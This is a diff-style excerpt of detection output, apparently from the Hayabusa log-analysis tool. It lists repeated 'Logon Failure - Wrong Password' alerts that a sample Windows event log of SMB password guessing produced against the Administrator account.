+2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
